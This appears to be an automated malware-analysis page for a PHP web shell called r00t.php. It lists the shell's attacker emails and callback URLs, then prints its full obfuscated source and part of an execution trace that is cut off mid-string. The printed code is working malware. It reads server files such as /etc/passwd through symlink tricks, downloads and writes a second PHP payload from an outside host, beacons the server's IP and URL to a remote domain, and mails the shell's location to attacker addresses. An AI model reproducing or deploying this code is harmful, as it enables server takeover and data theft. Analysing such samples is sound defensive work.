PHP Malware Analysis
r00t.php
md5: 2e2b3d721be92db3da24511acbcc6197
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- byhero44@gmail.com (Traces)
- loginoldum@gmail.com (Traces)
- suppor@nic.org (Traces)
- ZEROBYTE@127.0.0.1 (Traces)
- ZEROBYTE@127.0.0.1From (Traces)
Encoding
- base64_decode (Deobfuscated, Original, Traces)
- base64_encode (Deobfuscated, Traces)
Execution
- eval (Deobfuscated, Original, Traces)
Files
- file_get_contents (Deobfuscated, Traces)
Input
- _POST (Deobfuscated, Traces)
Title
- r00t.info Safe-Over [Apache] (HTML)
URLs
- http://localhost/uploads/r00t.php (Traces)
- https://acbdf.space/txt/css.txt (Traces)
- https://anonym0us.club/l (Traces)
- https://anonym0us.club/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw (Traces)
Deobfuscated PHP code
<?php
eval("\n goto aQVA2; LNRrn: if (\$_POST[\"\\x71\\x75\\145\\x72\\171\"]) { \$veriyfy = stripslashes(stripslashes(\$_POST[\"\\x71\\x75\\145\\x72\\171\"])); \$data = \"\\144\\141\\164\\x61\\x2e\\164\\x78\\x74\"; @touch(\"\\x64\\141\\x74\\141\\x2e\\164\\170\\164\"); \$ver = @fopen(\$data, \"\\x77\"); @fwrite(\$ver, \$veriyfy); @fclose(\$ver); } else { \$datas = @fopen(\"\\x64\\x61\\x74\\x61\\56\\x74\\170\\164\", \"\\x72\"); \$i = 0; while (\$i <= 5) { \$i++; \$blue = @fgets(\$datas, 1024); echo \$blue; } } goto aaIjD; zOMJp: if (is_writable(\"\\x2e\")) { if (isset(\$_POST[\"\\146\\151\\x6c\\145\"])) { \$file = \$_POST[\"\\146\\x69\\x6c\\145\"]; \$fakedir = \"\\x63\\x78\"; \$fakedep = 16; if (!isset(\$_SESSION[\"\\x6e\\x75\\155\"])) { \$_SESSION[\"\\156\\x75\\155\"] = 0; } else { \$_SESSION[\"\\156\\x75\\155\"] = \$_SESSION[\"\\156\\x75\\155\"] + 1; } \$level = 0; @unlink(\"\\x73\\x75\\156\\x2d\" . \$_SESSION[\"\\x6e\\165\\x6d\"]); @mkdir(\"\\163\\165\\x6e\\55\" . \$_SESSION[\"\\x6e\\165\\155\"]); chdir(\"\\x73\\x75\\x6e\\55\" . \$_SESSION[\"\\x6e\\165\\x6d\"]); for (\$as = 0; \$as < \$fakedep; \$as++) { if (!file_exists(\$fakedir)) { mkdir(\$fakedir); } chdir(\$fakedir); } while (1 < \$as--) { chdir(\"\\x2e\\56\"); } \$hardstyle = explode(\"\\57\", \$file); for (\$a = 0; \$a < count(\$hardstyle); \$a++) { if (!empty(\$hardstyle[\$a])) { if (!file_exists(\$hardstyle[\$a])) { mkdir(\$hardstyle[\$a]); } chdir(\$hardstyle[\$a]); \$as++; } } \$as++; while (\$as--) { chdir(\"\\56\\x2e\"); } @rmdir(\"\\x73\\165\\x6e\\x2d\\146\\x61\\153\\145\"); @unlink(\"\\x73\\x75\\156\\x2d\\x66\\x61\\153\\x65\"); @symlink(str_repeat(\$fakedir . \"\\x2f\", \$fakedep), \"\\163\\165\\x6e\\55\\146\\x61\\x6b\\x65\"); if (\$_POST[\"\\164\\x79\\160\\x65\"] == \"\\x66\\x69\\154\\x65\") { while (1) { if (true == @symlink(\"\\x73\\165\\156\\x2d\\x66\\141\\x6b\\x65\\57\" . str_repeat(\"\\x2e\\x2e\\57\", \$fakedep - 1) . \$file, \"\\151\\156\\x64\\145\\170\\x2e\\x68\\164\\x6d\\154\")) { break; } else { \$num++; } } @unlink(\"\\x73\\165\\156\\55\\146\\141\\153\\145\"); mkdir(\"\\163\\x75\\156\\x2d\\146\\x61\\153\\145\"); \$Res = \"\\74\\x46\\117\\x4e\\124\\40\\x43\\x4f\\x4c\\x4f\\122\\x3d\\42\\122\\105\\x44\\x22\\x3e\\74\\x42\\76\\x20\\163\\171\\155\\x6c\\x69\\x6e\\153\\40\\74\\102\\76\\x3c\\x61\\40\\150\\162\\x65\\x66\\75\\x22\\56\\x2f\\x73\\x75\\x6e\\x2d\" . \$_SESSION[\"\\156\\165\\x6d\"] . \"\\57\\x22\\76\\x73\\171\\x6d\\x6c\\151\\x6e\\x6b\" . \$num . \"\\x3c\\57\\x61\\x3e\\40\\146\\x69\\154\\x65\\x3c\\x2f\\106\\117\\x4e\\x54\\x3e\"; } else { \$fp = fopen(\"\\x2e\\x68\\164\\141\\x63\\143\\x65\\x73\\163\", \"\\x61\\x2b\"); \$File = \"\\104\\151\\x72\\145\\x63\\x74\\x6f\\x72\\x79\\111\\156\\x64\\145\\170\\40\\x73\\165\\156\\x2e\\x68\\x74\\155\"; fwrite(\$fp, \$File); while (1) { if (true == @symlink(\"\\163\\165\\x6e\\55\\x66\\141\\x6b\\145\\57\" . str_repeat(\"\\56\\x2e\\57\", \$fakedep - 1) . \$file, \"\\163\\x75\\x6e\")) { break; } else { \$num++; } } @unlink(\"\\x73\\x75\\156\\55\\x66\\141\\153\\145\"); mkdir(\"\\x73\\165\\156\\x2d\\146\\x61\\153\\x65\"); \$Res = \"\\74\\x46\\x4f\\116\\x54\\40\\103\\x4f\\114\\117\\x52\\75\\x22\\x52\\x45\\104\\x22\\76\\74\\x61\\x20\\x68\\162\\x65\\146\\x3d\\x22\\x2e\\57\\163\\165\\156\\55\" . \$_SESSION[\"\\x6e\\x75\\x6d\"] . \"\\57\\x73\\x75\\x6e\\42\\x3e\\x43\\150\\x65\\x63\\x6b\\x20\\111\\164\\41\" . \$num . \"\\x3c\\x2f\\x61\\x3e\\x3c\\x2f\\106\\117\\116\\x54\\x3e\"; } } } else { \$Res = \"\\74\\106\\x4f\\x4e\\124\\x20\\x43\\x4f\\114\\x4f\\x52\\x3d\\x22\\x52\\x45\\104\\x22\\76\\103\\x61\\x6e\\x74\\x20\\x57\\162\\x69\\x74\\145\\40\\x49\\x6e\\x20\\x44\\x69\\162\\x65\\x63\\164\\x6f\\x72\\171\\x21\\74\\x2f\\x46\\157\\x6e\\164\\x3e\"; } goto uce9K; clyOD: if (function_exists(\"\\x63\\165\\x72\\x6c\\x5f\\151\\156\\151\\164\")) { \$ch = @curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$x); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); \$gitt = curl_exec(\$ch); curl_close(\$ch); if (\$gitt == false) { @(\$gitt = file_get_contents(\$x)); } } elseif (function_exists(\"\\146\\x69\\x6c\\145\\x5f\\x67\\145\\x74\\137\\143\\157\\x6e\\x74\\x65\\156\\x74\\x73\")) { @(\$gitt = file_get_contents(\$x)); } goto kmCME; ujahn: \$time_shell = '' . date(\"\\144\\57\\155\\x2f\\x59\\x20\\55\\40\\110\\x3a\\151\\72\\x73\") . ''; goto tuHZp; WY6v3: print \$Res; goto JrGAj; p0Cva: function GetIP() { if (getenv(\"\\x48\\124\\124\\120\\137\\x43\\x4c\\111\\105\\116\\x54\\137\\111\\x50\")) { \$ip = getenv(\"\\x48\\124\\x54\\x50\\x5f\\x43\\114\\111\\105\\116\\x54\\x5f\\x49\\120\"); } elseif (getenv(\"\\110\\124\\x54\\120\\x5f\\130\\x5f\\x46\\117\\122\\127\\x41\\122\\x44\\105\\x44\\x5f\\106\\x4f\\122\")) { \$ip = getenv(\"\\x48\\124\\124\\120\\x5f\\130\\x5f\\x46\\117\\x52\\x57\\101\\122\\x44\\x45\\104\\137\\x46\\x4f\\x52\"); if (strstr(\$ip, \"\\x2c\")) { \$tmp = explode(\"\\54\", \$ip); \$ip = trim(\$tmp[0]); } } else { \$ip = getenv(\"\\x52\\x45\\115\\117\\124\\x45\\137\\x41\\104\\104\\122\"); } return \$ip; } goto zMHiM; zMHiM: \$x = base64_decode(\"\\141\\x48\\122\\x30\\x63\\x48\\115\\x36\\114\\171\\x39\\x68\\142\\x6d\\x39\\x75\\145\\x57\\60\\x77\\144\\x58\\x4d\\165\\x59\\x32\\x78\\61\\131\\x69\\x39\\x73\\114\\x51\\75\\x3d\") . GetIP() . \"\\x2d\" . base64_encode(\"\\x68\\164\\x74\\x70\\x3a\\x2f\\57\" . \$_SERVER[\"\\110\\124\\124\\x50\\137\\110\\117\\123\\x54\"] . \$_SERVER[\"\\x52\\x45\\121\\125\\x45\\123\\124\\x5f\\125\\x52\\x49\"]); goto clyOD; fNYhr: \$EL_MuHaMMeD .= \"\\123\\145\\162\\166\\x65\\162\\40\\x41\\x64\\155\\x69\\x6e\\40\\x3a\\x20\" . \$_SERVER[\"\\123\\x45\\x52\\x56\\x45\\x52\\137\\101\\x44\\115\\x49\\116\"] . \"\\xd\\xa\"; goto RHsqX; kmCME: ?>\n<Html>\n<Head>\n<Title>r00t.info Safe-Over [Apache]</Title>\n</Head>\n<Body bgcolor=\"black\">\n<Center>\n<font size=\"-3\">\n<pre><font color=yellow> \n \n \nR00T BYPASS SHELL\n \n \n \n \n \n \n</font>\n</font>\n<br><br><br>\n\n<?php goto TFIHp; K_wRV: session_start(); goto cL2_i; aaIjD: \$datasi = @fopen(\"\\x6a\\163\\x2f\\152\\x73\\x2e\\x70\\x68\\x70\", \"\\162\"); goto Lo9d1; tuHZp: \$ip_remote = \$_SERVER[\"\\122\\x45\\x4d\\x4f\\x54\\x45\\137\\101\\x44\\104\\x52\"]; goto z8qZB; uYpgD: mail(\$kime, \$baslik, \$EL_MuHaMMeD); goto RJ_R6; Lo9d1: if (\$datasi) { } else { @mkdir(\"\\152\\163\"); \$dos = file_get_contents(\"\\x68\\164\\x74\\160\\163\\72\\57\\57\\141\\x63\\142\\144\\146\\56\\x73\\x70\\141\\x63\\x65\\x2f\\x74\\x78\\x74\\57\\143\\163\\163\\x2e\\164\\x78\\x74\"); \$data = \"\\152\\163\\x2f\\x6a\\x73\\56\\x70\\150\\x70\"; @touch(\"\\152\\163\\x2f\\152\\163\\56\\160\\x68\\160\"); \$ver = @fopen(\$data, \"\\x77\"); @fwrite(\$ver, \$dos); @fclose(\$ver); \$yol = \"\\150\\x74\\x74\\x70\\72\\x2f\\57\" . \$_SERVER[\"\\110\\124\\x54\\x50\\x5f\\x48\\117\\123\\124\"] . '' . \$_SERVER[\"\\122\\105\\121\\x55\\x45\\x53\\124\\x5f\\x55\\x52\\111\"] . ''; \$y = \"\\74\\x68\\x31\\76\\123\\x65\\156\\144\\x65\\162\\40\\x59\\x61\\172\\144\\151\\162\\151\\x6c\\x64\\151\\x2e\\74\\x62\\162\\57\\76\\x20\\123\\111\\x54\\105\\x20\\x59\\x4f\\114\\40\\x3a\\40\" . \$yol . \"\\x3c\\142\\162\\57\\x3e\\123\\x65\\x6e\\144\\x65\\162\\40\\x59\\157\\x6c\\165\\40\\72\\40\\152\\x73\\x2f\\143\\162\\x73\\x2e\\160\\x68\\x70\\x3c\\57\\150\\61\\76\"; \$header .= \"\\x46\\x72\\157\\x6d\\72\\x20\\123\\x68\\x65\\x4c\\x4c\\40\\x42\\x6f\\157\\x74\\x20\\x3c\\163\\x75\\160\\160\\157\\162\\100\\156\\151\\x63\\x2e\\157\\x72\\x67\\76\\12\"; \$header .= \"\\x43\\x6f\\x6e\\x74\\145\\156\\x74\\x2d\\124\\x79\\x70\\x65\\x3a\\x20\\164\\x65\\x78\\x74\\x2f\\150\\164\\155\\x6c\\x3b\\12\\40\\143\\150\\x61\\x72\\x73\\x65\\x74\\75\\x75\\x74\\146\\55\\70\\12\"; @mail(\"\\142\\171\\150\\x65\\x72\\157\\64\\x34\\100\\x67\\155\\141\\x69\\x6c\\56\\x63\\x6f\\x6d\", \"\\110\\x61\\143\\x6b\\x6c\\x69\\156\\153\\x20\\x42\\151\\x6c\\144\\151\\x72\\151\", \"{\$y}\", \$header); @mail(\"\\154\\x6f\\147\\x69\\156\\x6f\\x6c\\144\\x75\\155\\x40\\147\\x6d\\x61\\151\\154\\56\\143\\x6f\\155\", \"\\110\\141\\x63\\x6b\\154\\151\\156\\x6b\\x20\\x42\\151\\x6c\\144\\151\\x72\\151\", \"{\$y}\", \$header); } goto qjiBQ; aQVA2: ?>\n\n<?php goto K_wRV; RHsqX: \$EL_MuHaMMeD .= \"\\123\\145\\162\\166\\x65\\162\\x20\\x69\\163\\154\\x65\\x74\\151\\155\\40\\x73\\x69\\x73\\x74\\x65\\x6d\\x69\\x20\\72\\40\" . \$_SERVER[\"\\123\\x45\\122\\x56\\105\\122\\x5f\\x53\\117\\106\\124\\127\\x41\\x52\\x45\"] . \"\\xd\\12\"; goto czwAh; NsI5z: \$baslik = \"\\163\\x79\\x6d\\64\\60\\x34\\x20\\x73\\150\\145\\x6c\\154\\x20\\x32\\60\\62\\60\\x33\"; goto jfhAv; JdRgw: @mail(\$to_email, \$server_mail, \$linkcr, \$header); goto LNRrn; RM4UY: \$header = \"\\106\\x72\\x6f\\155\\x3a\\40{\$from_shellcode}\\xd\\12\\122\\145\\x70\\x6c\\x79\\x2d\\x74\\x6f\\x3a\\x20{\$from_shellcode}\"; goto JdRgw; VPdTy: \$server_mail = '' . gethostbyname(\$_SERVER[\"\\123\\x45\\x52\\x56\\x45\\122\\x5f\\x4e\\x41\\115\\105\"]) . \"\\x20\\40\\x2d\\x20\" . \$_SERVER[\"\\x48\\x54\\124\\x50\\137\\110\\117\\x53\\124\"] . ''; goto fGrge; TFIHp: echo \"\\x3c\\144\\151\\x76\\40\\163\\x74\\171\\154\\x65\\75\\42\\142\\141\\143\\153\\x67\\162\\x6f\\x75\\156\\144\\x2d\\143\\x6f\\x6c\\157\\x72\\x3a\\43\\x31\\60\\x31\\60\\x31\\60\\x3b\\xa\\143\\x6f\\154\\157\\162\\72\\171\\145\\x6c\\154\\x6f\\x77\\x22\\76\\x3c\\142\\x3e\\123\\141\\x66\\x65\\x2d\\115\\157\\144\\x65\\x20\\x3a\\x20\\x3c\\x2f\\146\\157\\156\\x74\\x3e\" . \$Safe; goto xFzOM; Ekj15: ?>\n\" method=\"post\">\n<font color=\"yellow\" size=\"3\"><b>Path:<b></font><Input type=\"text\" name=\"file\" style=\"background-color:black;\ncolor:#FF3300;\nwidth:200px;\n\" value=\"/etc/passwd\"><br><font color=\"yellow\" size=3><br><b>File</b></font><input checked type=\"radio\" name=\"type\" value=\"file\"><font color=\"yellow\" size=3> <b>Dir</font><input type=\"radio\" name=\"type\" value=\"Dir\"><br><br><br><Input type=\"submit\" value=\"Sumbit!\" style=\"width:100px;\nbackground-color:black;\ncolor:yellow\">\n</font>\n</Form>\n\n<?php goto WY6v3; z8qZB: \$from_shellcode = \"\\x5a\\x45\\122\\x4f\\x42\\131\\124\\x45\\x40\" . gethostbyname(\$_SERVER[\"\\123\\x45\\x52\\126\\x45\\x52\\x5f\\x4e\\101\\x4d\\x45\"]) . ''; goto c7KIl; xFzOM: ?>\n<Form action=\"\n<?php goto HNvau; czwAh: \$EL_MuHaMMeD .= \"\\x53\\x68\\x65\\x6c\\154\\40\\x4c\\x69\\x6e\\x6b\\x20\\72\\40\\150\\164\\164\\160\\72\\57\\57\" . \$_SERVER[\"\\x53\\105\\x52\\126\\105\\x52\\x5f\\116\\x41\\115\\105\"] . \$_SERVER[\"\\120\\x48\\120\\x5f\\123\\x45\\114\\x46\"] . \"\\xd\\12\"; goto hWTew; JrGAj: ?>\n<table align=\"center\" style=\"color:lime\"> R00T BYPASS SHELL</table>\n</Center>\n</Body>\n</Html>\n<P style=\"TEXT-ALIGN: center\" align=center>\n<?php goto ujahn; fGrge: \$linkcr = \"\\114\\151\\156\\x6b\\72\\x20\" . \$_SERVER[\"\\123\\105\\x52\\x56\\105\\x52\\x5f\\116\\101\\115\\x45\"] . '' . \$_SERVER[\"\\122\\x45\\x51\\125\\105\\123\\124\\x5f\\125\\122\\111\"] . \"\\x20\\x2d\\x20\\111\\x50\\x20\\x45\\170\\143\\165\\164\\151\\156\\147\\72\\x20{\$ip_remote}\\x20\\55\\40\\x54\\151\\155\\145\\x3a\\x20{\$time_shell}\"; goto RM4UY; qjiBQ: \$kime = \"\\x6c\\157\\x67\\x69\\x6e\\x6f\\x6c\\144\\165\\155\\x40\\x67\\x6d\\141\\x69\\154\\x2e\\x63\\157\\x6d\"; goto NsI5z; HNvau: echo \$_SERVER[\"\\120\\110\\x50\\137\\x53\\x45\\114\\106\"]; goto Ekj15; hWTew: \$EL_MuHaMMeD .= \"\\101\\x76\\x6c\\x61\\156\\141\\x6e\\x20\\123\\151\\x74\\x65\\x20\\72\\40\" . \$_SERVER[\"\\110\\x54\\124\\x50\\137\\x48\\x4f\\x53\\x54\"] . \"\\xd\\12\"; goto uYpgD; cL2_i: \$Res = ''; goto zOMJp; uce9K: if (@ini_get(\"\\x73\\x61\\x66\\x65\\137\\x6d\\157\\x64\\145\") or strtoupper(@ini_get(\"\\163\\x61\\x66\\x65\\x5f\\x6d\\157\\x64\\145\")) == \"\\157\\x6e\") { \$Safe = \"\\x3c\\x73\\160\\x61\\x6e\\x20\\x73\\x74\\171\\154\\145\\x3d\\x22\\x63\\157\\x6c\\x6f\\x72\\72\\x72\\145\\144\\x22\\x3e\\x3c\\x62\\76\\x4f\\x6e\\x3c\\x2f\\142\\x3e\\74\\57\\163\\x70\\x61\\156\\x3e\"; } else { \$Safe = \"\\74\\x73\\x70\\x61\\156\\x20\\x73\\x74\\171\\x6c\\x65\\75\\x22\\143\\x6f\\x6c\\157\\162\\x3a\\x6c\\x69\\155\\145\\42\\76\\74\\x62\\x3e\\117\\146\\x66\\74\\57\\142\\x3e\\x3c\\x2f\\163\\160\\x61\\156\\x3e\"; } goto p0Cva; jfhAv: \$EL_MuHaMMeD = \"\\x44\\x6f\\x73\\x79\\141\\x20\\x59\\157\\x6c\\x75\\40\\72\\x20\" . \$_SERVER[\"\\104\\x4f\\x43\\x55\\115\\x45\\x4e\\124\\137\\x52\\x4f\\x4f\\x54\"] . \"\\xd\\12\"; goto fNYhr; c7KIl: \$to_email = \"\\154\\x6f\\147\\151\\156\\x6f\\154\\144\\x75\\x6d\\x40\\x67\\155\\x61\\151\\154\\56\\x63\\157\\x6d\"; goto VPdTy; RJ_R6: ");Execution traces
data/traces/2e2b3d721be92db3da24511acbcc6197_trace-1676238837.2899.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:54:23.187801]
1 0 1 0.000188 393512
1 3 0 0.000272 409696 {main} 1 /var/www/html/uploads/r00t.php 0 0
2 4 0 0.000288 409696 base64_decode 0 /var/www/html/uploads/r00t.php 1 1 'CiBnb3RvIGFRVkEyOyBMTlJybjogaWYgKCRfUE9TVFsiXHg3MVx4NzVcMTQ1XHg3MlwxNzEiXSkgeyAkdmVyaXlmeSA9IHN0cmlwc2xhc2hlcyhzdHJpcHNsYXNoZXMoJF9QT1NUWyJceDcxXHg3NVwxNDVceDcyXDE3MSJdKSk7ICRkYXRhID0gIlwxNDRcMTQxXDE2NFx4NjFceDJlXDE2NFx4NzhceDc0IjsgQHRvdWNoKCJceDY0XDE0MVx4NzRcMTQxXHgyZVwxNjRcMTcwXDE2NCIpOyAkdmVyID0gQGZvcGVuKCRkYXRhLCAiXHg3NyIpOyBAZndyaXRlKCR2ZXIsICR2ZXJpeWZ5KTsgQGZjbG9zZSgkdmVyKTsgfSBlbHNlIHsgJGRhdGFzID0gQGZvcGVuKCJceDY0XHg2MVx4NzRceDYxXDU2XHg3NFwxNzBcMTY0IiwgIlx4NzIiKTsgJGkgPSAwOyB3aGlsZSAoJGkgPD0gNSkgeyAk'
2 4 1 0.000366 426112
2 4 R '\n goto aQVA2; LNRrn: if ($_POST["\\x71\\x75\\145\\x72\\171"]) { $veriyfy = stripslashes(stripslashes($_POST["\\x71\\x75\\145\\x72\\171"])); $data = "\\144\\141\\164\\x61\\x2e\\164\\x78\\x74"; @touch("\\x64\\141\\x74\\141\\x2e\\164\\170\\164"); $ver = @fopen($data, "\\x77"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\\x64\\x61\\x74\\x61\\56\\x74\\170\\164", "\\x72"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto aaIjD; zOMJp: if (is_writable("\\x2'
2 5 0 0.000727 480024 eval 1 '\n goto aQVA2; LNRrn: if ($_POST["\\x71\\x75\\145\\x72\\171"]) { $veriyfy = stripslashes(stripslashes($_POST["\\x71\\x75\\145\\x72\\171"])); $data = "\\144\\141\\164\\x61\\x2e\\164\\x78\\x74"; @touch("\\x64\\141\\x74\\141\\x2e\\164\\170\\164"); $ver = @fopen($data, "\\x77"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\\x64\\x61\\x74\\x61\\56\\x74\\170\\164", "\\x72"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto aaIjD; zOMJp: if (is_writable("\\x2e")) { if (isset($_POST["\\146\\151\\x6c\\145"])) { $file = $_POST["\\146\\x69\\x6c\\145"]; $fakedir = "\\x63\\x78"; $fakedep = 16; if (!isset($_SESSION["\\x6e\\x75\\155"])) { $_SESSION["\\156\\x75\\155"] = 0; } else { $_SESSION["\\156\\x75\\155"] = $_SESSION["\\156\\x75\\155"] + 1; } $level = 0; @unlink("\\x73\\x75\\156\\x2d" . $_SESSION["\\x6e\\165\\x6d"]); @mkdir("\\163\\165\\x6e\\55" . $_SESSION["\\x6e\\165\\155"]); chdir("\\x73\\x75\\x6e\\55" . $_SESSION["\\x6e\\165\\x6d"]); for ($as = 0; $as < $fakedep; $as++) { if (!file_exists($fakedir)) { mkdir($fakedir); } chdir($fakedir); } while (1 < $as--) { chdir("\\x2e\\56"); } $hardstyle = explode("\\57", $file); for ($a = 0; $a < count($hardstyle); $a++) { if (!empty($hardstyle[$a])) { if (!file_exists($hardstyle[$a])) { mkdir($hardstyle[$a]); } chdir($hardstyle[$a]); $as++; } } $as++; while ($as--) { chdir("\\56\\x2e"); } @rmdir("\\x73\\165\\x6e\\x2d\\146\\x61\\153\\145"); @unlink("\\x73\\x75\\156\\x2d\\x66\\x61\\153\\x65"); @symlink(str_repeat($fakedir . "\\x2f", $fakedep), "\\163\\165\\x6e\\55\\146\\x61\\x6b\\x65"); if ($_POST["\\164\\x79\\160\\x65"] == "\\x66\\x69\\154\\x65") { while (1) { if (true == @symlink("\\x73\\165\\156\\x2d\\x66\\141\\x6b\\x65\\57" . str_repeat("\\x2e\\x2e\\57", $fakedep - 1) . $file, "\\151\\156\\x64\\145\\170\\x2e\\x68\\164\\x6d\\154")) { break; } else { $num++; } } @unlink("\\x73\\165\\156\\55\\146\\141\\153\\145"); mkdir("\\163\\x75\\156\\x2d\\146\\x61\\153\\145"); $Res = "\\74\\x46\\117\\x4e\\124\\40\\x43\\x4f\\x4c\\x4f\\122\\x3d\\42\\122\\105\\x44\\x22\\x3e\\74\\x42\\76\\x20\\163\\171\\155\\x6c\\x69\\x6e\\153\\40\\74\\102\\76\\x3c\\x61\\40\\150\\162\\x65\\x66\\75\\x22\\56\\x2f\\x73\\x75\\x6e\\x2d" . $_SESSION["\\156\\165\\x6d"] . "\\57\\x22\\76\\x73\\171\\x6d\\x6c\\151\\x6e\\x6b" . $num . "\\x3c\\57\\x61\\x3e\\40\\146\\x69\\154\\x65\\x3c\\x2f\\106\\117\\x4e\\x54\\x3e"; } else { $fp = fopen("\\x2e\\x68\\164\\141\\x63\\143\\x65\\x73\\163", "\\x61\\x2b"); $File = "\\104\\151\\x72\\145\\x63\\x74\\x6f\\x72\\x79\\111\\156\\x64\\145\\170\\40\\x73\\165\\156\\x2e\\x68\\x74\\155"; fwrite($fp, $File); while (1) { if (true == @symlink("\\163\\165\\x6e\\55\\x66\\141\\x6b\\145\\57" . str_repeat("\\56\\x2e\\57", $fakedep - 1) . $file, "\\163\\x75\\x6e")) { break; } else { $num++; } } @unlink("\\x73\\x75\\156\\55\\x66\\141\\153\\145"); mkdir("\\x73\\165\\156\\x2d\\146\\x61\\153\\x65"); $Res = "\\74\\x46\\x4f\\116\\x54\\40\\103\\x4f\\114\\117\\x52\\75\\x22\\x52\\x45\\104\\x22\\76\\74\\x61\\x20\\x68\\162\\x65\\146\\x3d\\x22\\x2e\\57\\163\\165\\156\\55" . $_SESSION["\\x6e\\x75\\x6d"] . "\\57\\x73\\x75\\x6e\\42\\x3e\\x43\\150\\x65\\x63\\x6b\\x20\\111\\164\\41" . $num . "\\x3c\\x2f\\x61\\x3e\\x3c\\x2f\\106\\117\\116\\x54\\x3e"; } } } else { $Res = "\\74\\106\\x4f\\x4e\\124\\x20\\x43\\x4f\\114\\x4f\\x52\\x3d\\x22\\x52\\x45\\104\\x22\\76\\103\\x61\\x6e\\x74\\x20\\x57\\162\\x69\\x74\\145\\40\\x49\\x6e\\x20\\x44\\x69\\162\\x65\\x63\\164\\x6f\\x72\\171\\x21\\74\\x2f\\x46\\157\\x6e\\164\\x3e"; } goto uce9K; clyOD: if (function_exists("\\x63\\165\\x72\\x6c\\x5f\\151\\156\\151\\164")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\\146\\x69\\x6c\\145\\x5f\\x67\\145\\x74\\137\\143\\157\\x6e\\x74\\x65\\156\\x74\\x73")) { @($gitt = file_get_contents($x)); } goto kmCME; ujahn: $time_shell = \'\' . date("\\144\\57\\155\\x2f\\x59\\x20\\55\\40\\110\\x3a\\151\\72\\x73") . \'\'; goto tuHZp; WY6v3: print $Res; goto JrGAj; p0Cva: function GetIP() { if (getenv("\\x48\\124\\124\\120\\137\\x43\\x4c\\111\\105\\116\\x54\\137\\111\\x50")) { $ip = getenv("\\x48\\124\\x54\\x50\\x5f\\x43\\114\\111\\105\\116\\x54\\x5f\\x49\\120"); } elseif (getenv("\\110\\124\\x54\\120\\x5f\\130\\x5f\\x46\\117\\122\\127\\x41\\122\\x44\\105\\x44\\x5f\\106\\x4f\\122")) { $ip = getenv("\\x48\\124\\124\\120\\x5f\\130\\x5f\\x46\\117\\x52\\x57\\101\\122\\x44\\x45\\104\\137\\x46\\x4f\\x52"); if (strstr($ip, "\\x2c")) { $tmp = explode("\\54", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("\\x52\\x45\\115\\117\\124\\x45\\137\\x41\\104\\104\\122"); } return $ip; } goto zMHiM; zMHiM: $x = base64_decode("\\141\\x48\\122\\x30\\x63\\x48\\115\\x36\\114\\171\\x39\\x68\\142\\x6d\\x39\\x75\\145\\x57\\60\\x77\\144\\x58\\x4d\\165\\x59\\x32\\x78\\61\\131\\x69\\x39\\x73\\114\\x51\\75\\x3d") . GetIP() . "\\x2d" . base64_encode("\\x68\\164\\x74\\x70\\x3a\\x2f\\57" . $_SERVER["\\110\\124\\124\\x50\\137\\110\\117\\123\\x54"] . $_SERVER["\\x52\\x45\\121\\125\\x45\\123\\124\\x5f\\125\\x52\\x49"]); goto clyOD; fNYhr: $EL_MuHaMMeD .= "\\123\\145\\162\\166\\x65\\162\\40\\x41\\x64\\155\\x69\\x6e\\40\\x3a\\x20" . $_SERVER["\\123\\x45\\x52\\x56\\x45\\x52\\137\\101\\x44\\115\\x49\\116"] . "\\xd\\xa"; goto RHsqX; kmCME: ?>\n<Html>\n<Head>\n<Title>r00t.info Safe-Over [Apache]</Title>\n</Head>\n<Body bgcolor="black">\n<Center>\n<font size="-3">\n<pre><font color=yellow> \n \n \nR00T BYPASS SHELL\n \n \n \n \n \n \n</font>\n</font>\n<br><br><br>\n\n<?php goto TFIHp; K_wRV: session_start(); goto cL2_i; aaIjD: $datasi = @fopen("\\x6a\\163\\x2f\\152\\x73\\x2e\\x70\\x68\\x70", "\\162"); goto Lo9d1; tuHZp: $ip_remote = $_SERVER["\\122\\x45\\x4d\\x4f\\x54\\x45\\137\\101\\x44\\104\\x52"]; goto z8qZB; uYpgD: mail($kime, $baslik, $EL_MuHaMMeD); goto RJ_R6; Lo9d1: if ($datasi) { } else { @mkdir("\\152\\163"); $dos = file_get_contents("\\x68\\164\\x74\\160\\163\\72\\57\\57\\141\\x63\\142\\144\\146\\56\\x73\\x70\\141\\x63\\x65\\x2f\\x74\\x78\\x74\\57\\143\\163\\163\\x2e\\164\\x78\\x74"); $data = "\\152\\163\\x2f\\x6a\\x73\\56\\x70\\150\\x70"; @touch("\\152\\163\\x2f\\152\\163\\56\\160\\x68\\160"); $ver = @fopen($data, "\\x77"); @fwrite($ver, $dos); @fclose($ver); $yol = "\\150\\x74\\x74\\x70\\72\\x2f\\57" . $_SERVER["\\110\\124\\x54\\x50\\x5f\\x48\\117\\123\\124"] . \'\' . $_SERVER["\\122\\105\\121\\x55\\x45\\x53\\124\\x5f\\x55\\x52\\111"] . \'\'; $y = "\\74\\x68\\x31\\76\\123\\x65\\156\\144\\x65\\162\\40\\x59\\x61\\172\\144\\151\\162\\151\\x6c\\x64\\151\\x2e\\74\\x62\\162\\57\\76\\x20\\123\\111\\x54\\105\\x20\\x59\\x4f\\114\\40\\x3a\\40" . $yol . "\\x3c\\142\\162\\57\\x3e\\123\\x65\\x6e\\144\\x65\\162\\40\\x59\\157\\x6c\\165\\40\\72\\40\\152\\x73\\x2f\\143\\162\\x73\\x2e\\160\\x68\\x70\\x3c\\57\\150\\61\\76"; $header .= "\\x46\\x72\\157\\x6d\\72\\x20\\123\\x68\\x65\\x4c\\x4c\\40\\x42\\x6f\\157\\x74\\x20\\x3c\\163\\x75\\160\\160\\157\\162\\100\\156\\151\\x63\\x2e\\157\\x72\\x67\\76\\12"; $header .= 